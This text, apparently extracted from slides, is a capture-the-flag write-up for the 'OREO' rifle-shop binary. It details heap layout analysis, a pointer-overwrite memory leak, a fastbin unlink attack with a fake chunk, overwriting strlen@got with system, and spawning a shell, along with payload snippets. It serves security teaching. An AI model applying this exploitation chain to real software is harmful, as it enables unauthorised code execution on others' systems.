2. The Original Rifle Company has the most
finest rifles and revolvers in whole
Rodeo City! However their buildings are
pretty secure, so your only chance to get
into their offices is by hacking through
the Original Rifle Ecommerce Online
(OREO) System and steal all those pretty
weapons from the inside! Makes sense
right? Good luck!
nc wildwildweb.fluxfingers.net 1414
3. Welcome to the OREO Original Rifle Ecommerce Online System!
,______________________________________
|_________________,----------._ [____] -,__ __....-----=====
(_(||||||||||||)___________/ |
`----------' OREO [ ))"-, |
"" `, _,--....___ |
`/ """"
What would you like to do?
1. Add new rifle
2. Show added rifles
3. Order selected rifles
4. Leave a Message with your Order
5. Show current stats
6. Exit!
Action: 1
Rifle name: hogehoge
Rifle description: sample rifle
Action: 2
Rifle to be ordered:
===================================
Name: hogehoge
Description: sample rifle
===================================
Action:
6. Dynamic Analysis
• We can order rifles
1. Select rifles you want to order
• Need to specify rifle name & description
2. Submit an order for selected rifles
• Can leave a message
12. Understanding Rifle
Management using GDB
• After adding 2 rifles
• After order size + flag, fd, bk
“A” “a”
“b”“B”
It can be found from 0x0804A288 that
stores address of last rifle
13. • After adding 2 rifles
Heap
Chunk 2
Chunk 1
Understanding Rifle
Management
Rifle 2
0x00000041 (size + flag)
(prev size)
Rifle 1
description
name
0
0x00000041 (size + flag)
(prev size)
description
name
address of Rifle 1
19. Memory Leakage
• Overwrite last rifle address
Heap
Chunk 1
Rifle 1
description
name
0
0x41 (size + flag)
(prev size)
Target data
You can read target data as rifle’s
description using show command
“A” * 0x1B
+ address of target data
20. Fastbins Unlink Attack
• Breaking fastbins chain
Heap
Freed
Chunk 2
Reallocated
Chunk 1
0x42 (size + flag)
(prev size)
0x41 (size + flag)
(prev size)
address of Chunk 1
bk
Rifle 3
description
name
0
“A” * 0x1F
+ 0
+ 0
+ 0x41
+ address of target memory
Target memory
It used as a heap
chunk after re-
allocating Chunk 2
Add a rifle after free 2
rifles
21. Reference: Fastbins Unlink
Attack
• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
To avoid size check failure, you have to
put a correct value into “size”
(In this case, the value must be 0x41)
22. Making Fake Freed Chunk
• You have to find the area that can be set to
0x41 when re-allocation
Chunk
0x41 (size + flag)
(prev size)
fd
bk
You can use 0x804A2A0 as a
freed chunk because
rifle_counter can be set 0x41
23. Exploitation Process
1. Leak address of ibc functions
2. Calc address of “system”
3. Add rifles until rifle counter is 0x3F
4. Order rifles (free fastbins)
5. Breaking fastbins chain by adding a rifle
6. Allocate 0x804A2A0 as a heap chunk by adding a rifle
7. Overwrite GOT by leaving message
8. Get shell
25. Exploitation Process
3. Add rifles until rifle counter is 0x3F
4. Order rifles (Free fastbins)
while rifle_count < 0x3e:
cmd_add("A"*27+p(0), "B")
cmd_add("A", "B")
cmd_order()
To avoid to create many fast chunks,
the “last” should be 0x00000000
26. Exploitation Process
6. Allocate 0x804A2A0 as a heap chunk by
adding a rifle
• Before allocation, rifle counter will be 0x41
• Its description must be addr of strlen@got
Address Before After
0x804A2A0 orderd_counter prev_size 0x00000000
0x804A2A4 rifle_counter size + flag 0x00000041
0x804A2A8 lpMsg description address of strlen@got
0x804a2c1 msg_buf + 1 name “foobar"
0x804a2dc msg_buf + 0x1C last Unknown
strlen@got is will be call the
program after adding a
rifle/leaving a message
27. Exploitation Process
7. Overwrite strlen@got by leaving a message
• Now lpMsg points to strlen@got
• Message should be p(libc_system) + “;sh
x00"
• “;shx00" will be used in next step
28. Exploitation Process
8. Get shell
• Overwrote strlen will be called after
adding the rifle
• Its argument is the message:
p(libc_system) + “;shx00”
• It means the program will call
system(“x??x??x??x??;sh”)